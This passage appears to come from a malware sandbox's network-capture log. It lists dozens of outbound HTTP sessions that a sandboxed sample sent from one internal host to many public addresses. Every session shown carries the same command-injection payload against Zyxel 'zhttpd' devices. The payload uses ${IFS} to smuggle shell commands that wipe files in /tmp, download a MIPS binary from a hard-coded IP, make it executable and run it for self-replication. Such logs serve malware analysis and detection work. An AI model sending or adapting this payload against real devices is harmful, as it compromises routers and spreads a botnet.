                                                  6448192.168.2.135326053.254.158.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218681097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6449192.168.2.135324652.116.66.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218743086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6450192.168.2.1350860186.27.3.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218780994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6451192.168.2.1337218120.139.34.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218801022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6452192.168.2.1348868151.82.127.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218831062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6453192.168.2.135071293.39.105.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218897104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6454192.168.2.13529488.132.39.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218924046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6455192.168.2.1341606103.214.230.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218971014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6456192.168.2.1353332209.174.240.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218997002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6457192.168.2.135713296.145.90.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219055891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6458192.168.2.1352390128.173.12.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219079018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6459192.168.2.1340696176.115.85.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219125032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6460192.168.2.1341598169.165.245.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219161987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6461192.168.2.135778697.26.118.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219192028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6462192.168.2.1360050178.105.138.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219254971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6463192.168.2.1334354196.94.59.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219285011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6464192.168.2.1351582179.216.203.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219319105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6465192.168.2.133279019.132.86.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219345093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6466192.168.2.135289485.48.173.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219388962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6467192.168.2.133790042.11.148.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219444990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6468192.168.2.1334064157.199.40.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219486952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6469192.168.2.1357084130.202.65.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219504118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6470192.168.2.135200295.202.189.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219546080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6471192.168.2.135063231.108.241.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219585896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6472192.168.2.134475669.49.176.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219626904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6473192.168.2.1343422164.246.186.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219669104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6474192.168.2.1341548103.176.178.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219701052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6475192.168.2.1346826107.87.60.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219719887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6476192.168.2.1357406143.72.101.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219763994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6477192.168.2.133691431.166.47.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219795942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6478192.168.2.135870814.9.61.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219832897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6479192.168.2.1337458132.66.162.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219870090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6480192.168.2.1349052116.137.113.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219892025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6481192.168.2.136098612.218.190.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219926119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6482192.168.2.1336684178.194.228.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219949961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6483192.168.2.1342412114.128.210.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.219995022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6484192.168.2.1336160185.184.154.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220029116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6485192.168.2.135043074.250.65.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220093966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6486192.168.2.1345580145.99.61.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220139027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6487192.168.2.133568865.199.48.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220192909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6488192.168.2.135573043.224.22.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220222950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6489192.168.2.134668240.49.103.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220279932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6490192.168.2.1353726196.104.55.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220305920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6491192.168.2.13576165.227.140.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220365047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6492192.168.2.1359406198.121.15.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220401049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6493192.168.2.13433648.219.178.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220443964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6494192.168.2.133910251.71.129.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220475912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6495192.168.2.1341208183.154.49.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220506907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6496192.168.2.1349166168.254.120.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220545053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6497192.168.2.1360814175.41.205.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220578909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6498192.168.2.1355528177.86.137.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220627069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6499192.168.2.134211869.148.0.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220669985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6500192.168.2.134412675.161.113.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220720053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6501192.168.2.1335528179.243.226.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220766068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6502192.168.2.1360670117.134.56.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220766068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6503192.168.2.1340164206.56.30.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220814943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6504192.168.2.1349960217.18.203.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220860958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6505192.168.2.135518494.210.140.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220863104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6506192.168.2.134606290.201.27.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220921040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6507192.168.2.1352034187.101.233.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.220976114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6508192.168.2.1332868156.99.121.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221004009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6509192.168.2.1337632162.145.192.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221060038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6510192.168.2.1358712123.17.138.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221110106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6511192.168.2.1352258205.25.110.200443
